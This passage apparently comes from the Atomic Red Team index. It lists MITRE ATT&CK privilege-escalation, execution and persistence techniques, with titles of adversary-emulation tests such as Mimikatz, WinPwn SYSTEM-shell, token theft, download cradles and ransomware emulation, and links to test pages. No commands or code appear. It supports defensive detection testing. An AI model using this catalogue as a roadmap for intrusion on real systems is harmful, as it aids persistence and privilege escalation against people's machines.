- Atomic Test #2: Activate Guest Account [windows]
- Atomic Test #3: Enable Guest Account on macOS [macos]
- [T1547.003 Time Providers](../../T1547.003/T1547.003.md)
- Atomic Test #1: Create a new time provider [windows]
- Atomic Test #2: Edit an existing time provider [windows]
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap EXIT [macos, linux]
- Atomic Test #2: Trap SIGINT [macos, linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.011 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
- Atomic Test #1: Access Token Manipulation [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- Atomic Test #4: Make and modify capabilities of a binary [linux]
- Atomic Test #5: Provide the SetUID capability to a file [linux]
- Atomic Test #6: Do reconnaissance for files that have the setuid bit set [linux]
- Atomic Test #7: Do reconnaissance for files that have the setgid bit set [linux]
- [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
- Atomic Test #4: Winlogon HKLM Shell Key Persistence - PowerShell [windows]
- Atomic Test #5: Winlogon HKLM Userinit Key Persistence - PowerShell [windows]
- [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- Atomic Test #3: GlobalFlags in Image File Execution Options [windows]
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.008 Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- T1138 Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
- Atomic Test #1: Create registry persistence via AppCert DLL [windows]
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
- Atomic Test #1: Persistence by modifying Windows Terminal profile [windows]
- Atomic Test #2: Add macOS LoginItem using Applescript [macos]
- [T1134.001 Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md)
- Atomic Test #1: Named pipe client impersonation [windows]
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
- Atomic Test #3: Launch NSudo Executable [windows]
- Atomic Test #4: Bad Potato [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
- Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
- Atomic Test #2: Persistence via WMI Event Subscription - ActiveScriptEventConsumer [windows]
- Atomic Test #3: Windows MOFComp.exe Load MOF File [windows]
- [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
- Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
- Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
- Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- [T1546.001 Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1015 Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.014 Event Triggered Execution: Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- T1502 Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1169 Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
- Atomic Test #3: PowerShell Registry RunOnce [windows]
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
- Atomic Test #8: Add persistance via Recycle bin [windows]
- Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
- Atomic Test #10: Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value [windows]
- Atomic Test #11: Change Startup Folder - HKCU Modify User Shell Folders Startup Value [windows]
- Atomic Test #12: HKCU - Policy Settings Explorer Run Key [windows]
- Atomic Test #13: HKLM - Policy Settings Explorer Run Key [windows]
- Atomic Test #14: HKLM - Append Command to Winlogon Userinit KEY Value [windows]
- Atomic Test #15: HKLM - Modify default System Shell - Winlogon Shell KEY Value [windows]
- Atomic Test #16: secedit used to create a Run key in the HKLM Hive [windows]
- Atomic Test #17: Modify BootExecute Value [windows]
- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- Atomic Test #2: MacOS - Load Kernel Module via kextload and kmutil [macos]
- Atomic Test #3: MacOS - Load Kernel Module via KextManagerLoadKextWithURL() [macos]
- Atomic Test #4: Snake Malware Kernel Driver Comadmin [windows]
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546 Event Triggered Execution](../../T1546/T1546.md)
- Atomic Test #1: Persistence with Custom AutodialDLL [windows]
- Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
- Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) [windows]
- Atomic Test #4: WMI Invoke-CimMethod Start Process [windows]
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- Atomic Test #3: Append to the system shell profile [linux]
- Atomic Test #4: Append commands user shell profile [linux]
- Atomic Test #5: System shell profile scripts [linux]
- Atomic Test #6: Create/Append to .bash_logout [linux]
- [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
- Atomic Test #1: Injection SID-History with mimikatz [windows]
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
- Atomic Test #1: Authentication Package [windows]
- [T1546.015 Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md)
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
- Atomic Test #4: COM hijacking via TreatAs [windows]
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.005 Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1034 Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1088 Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.002 Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- [T1543.001 Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- Atomic Test #2: Event Monitor Daemon Persistence [macos]
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1519 Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.002 Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.007 Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Copy in loginwindow.plist for Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications using LoginHook [macos]
- Atomic Test #3: Append to existing loginwindow for Re-Opened Applications [macos]
- [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.008 Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md)
- Atomic Test #1: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt [windows]
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: At - Schedule a job [linux]
- [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
- [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
- Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
- Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #10: Login as nobody (Linux) [linux]
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
# execution
- [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
- Atomic Test #9: PowerShell Modify A Scheduled Task [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
- Atomic Test #3: WMI Reconnaissance Software [windows]
- Atomic Test #4: WMI Reconnaissance List Remote Services [windows]
- Atomic Test #5: WMI Execute Local Process [windows]
- Atomic Test #6: WMI Execute Remote Process [windows]
- Atomic Test #7: Create a Process using WMI Query and an Encoded Command [windows]
- Atomic Test #8: Create a Process using obfuscated Win32_Process [windows]
- Atomic Test #9: WMI Execute rundll32 [windows]
- Atomic Test #10: Application uninstall using WMIC [windows]
- T1129 Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.007 Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md)
- Atomic Test #1: JScript execution to gather local computer information via cscript [windows]
- Atomic Test #2: JScript execution to gather local computer information via wscript [windows]
- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- T1121 Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1559.002 Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md)
- Atomic Test #1: Execute Commands [windows]
- Atomic Test #2: Execute PowerShell script via Word DDE [windows]
- Atomic Test #3: DDEAUTO [windows]
- [T1204.002 User Execution: Malicious File](../../T1204.002/T1204.002.md)
- Atomic Test #1: OSTap Style Macro Execution [windows]
- Atomic Test #2: OSTap Payload Download [windows]
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- Atomic Test #5: Office launching .bat file from AppData [windows]
- Atomic Test #6: Excel 4 Macro [windows]
- Atomic Test #7: Headless Chrome code execution via VBA [windows]
- Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
- Atomic Test #9: Office Generic Payload Download [windows]
- Atomic Test #10: LNK Payload Download [windows]
- Atomic Test #11: Mirror Blast Emulation [windows]
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.002 Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md)
- Atomic Test #1: AppleScript [macos]
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique [windows]
- Atomic Test #3: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique [windows]
- Atomic Test #4: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique [windows]
- T1153 Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1152 Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1610 Deploy a container](../../T1610/T1610.md)
- Atomic Test #1: Deploy Docker container [containers]
- T1155 AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1085 Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1117 Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1177 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1609 Kubernetes Exec Into Container](../../T1609/T1609.md)
- Atomic Test #1: ExecIntoContainer [containers]
- Atomic Test #2: Docker Exec Into Container [containers]
- T1191 CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1569.001 System Services: Launchctl](../../T1569.001/T1569.001.md)
- Atomic Test #1: Launchctl [macos]
- T1059.008 Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1559.003 XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1196 Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- Atomic Test #2: PDQ Deploy RAT [windows]
- [T1059.001 Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md)
- Atomic Test #1: Mimikatz [windows]
- Atomic Test #2: Run BloodHound from local disk [windows]
- Atomic Test #3: Run Bloodhound from Memory using Download Cradle [windows]
- Atomic Test #4: Obfuscation Tests [windows]
- Atomic Test #5: Mimikatz - Cradlecraft PsSendKeys [windows]
- Atomic Test #6: Invoke-AppPathBypass [windows]
- Atomic Test #7: Powershell MsXml COM object - with prompt [windows]
- Atomic Test #8: Powershell XML requests [windows]
- Atomic Test #9: Powershell invoke mshta.exe download [windows]
- Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- Atomic Test #11: PowerShell Fileless Script Execution [windows]
- Atomic Test #12: PowerShell Downgrade Attack [windows]
- Atomic Test #13: NTFS Alternate Data Stream Access [windows]
- Atomic Test #14: PowerShell Session Creation and Use [windows]
- Atomic Test #15: ATHPowerShellCommandLineParameter -Command parameter variations [windows]
- Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
- Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
- Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
- Atomic Test #19: PowerShell Command Execution [windows]
- Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
- Atomic Test #21: PowerUp Invoke-AllChecks [windows]
- Atomic Test #22: Abuse Nslookup with DNS Records [windows]
- T1170 Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Command-Line Interface [macos, linux]
- Atomic Test #3: Harvest SUID executable files [linux]
- Atomic Test #4: LinEnum tool execution [linux]
- Atomic Test #5: New script file in the tmp directory [linux]
- Atomic Test #6: What shell is running [linux]
- Atomic Test #7: What shells are available [linux]
- Atomic Test #8: Command line scripts [linux]
- Atomic Test #9: Obfuscated command line scripts [linux]
- Atomic Test #10: Change login shell [linux]
- Atomic Test #11: Environment variable scripts [linux]
- Atomic Test #12: Detecting pipe-to-shell [linux]
- [T1559 Inter-Process Communication](../../T1559/T1559.md)
- Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows]
- Atomic Test #2: Cobalt Strike Lateral Movement (psexec_psh) pipe [windows]
- Atomic Test #3: Cobalt Strike SSH (postex_ssh) pipe [windows]
- Atomic Test #4: Cobalt Strike post-exploitation pipe (4.2 and later) [windows]
- Atomic Test #5: Cobalt Strike post-exploitation pipe (before 4.2) [windows]
- [T1204.003 User Execution: Malicious Image](../../T1204.003/T1204.003.md)
- Atomic Test #1: Malicious Execution from Mounted ISO Image [windows]
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md)
- Atomic Test #1: Execute shell script via python's command mode arguement [linux]
- Atomic Test #2: Execute Python via scripts (Linux) [linux]
- Atomic Test #3: Execute Python via Python executables (Linux) [linux]
- Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [linux]
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.003 Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- Atomic Test #2: Writes text to a file and displays it. [windows]
- Atomic Test #3: Suspicious Execution via Windows Command Shell [windows]
- Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows]
- Atomic Test #5: Command Prompt read contents from CMD file and execute [windows]
- T1223 Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1651 Cloud Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.005 Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
- Atomic Test #2: Encoded VBS code execution [windows]
- Atomic Test #3: Extract Memory via VBA [windows]
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1648 Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1173 Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1569.002 System Services: Service Execution](../../T1569.002/T1569.002.md)
- Atomic Test #1: Execute a Command as a Service [windows]
- Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
- Atomic Test #3: psexec.py (Impacket) [linux]
- Atomic Test #4: BlackCat pre-encryption cmds with Lateral Movement [windows]
- Atomic Test #5: Use RemCom to execute a command on a remote host [windows]
- Atomic Test #6: Snake Malware Service Create [windows]
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: At - Schedule a job [linux]
- T1035 Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1086 PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
- Atomic Test #9: PowerShell Modify A Scheduled Task [windows]
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
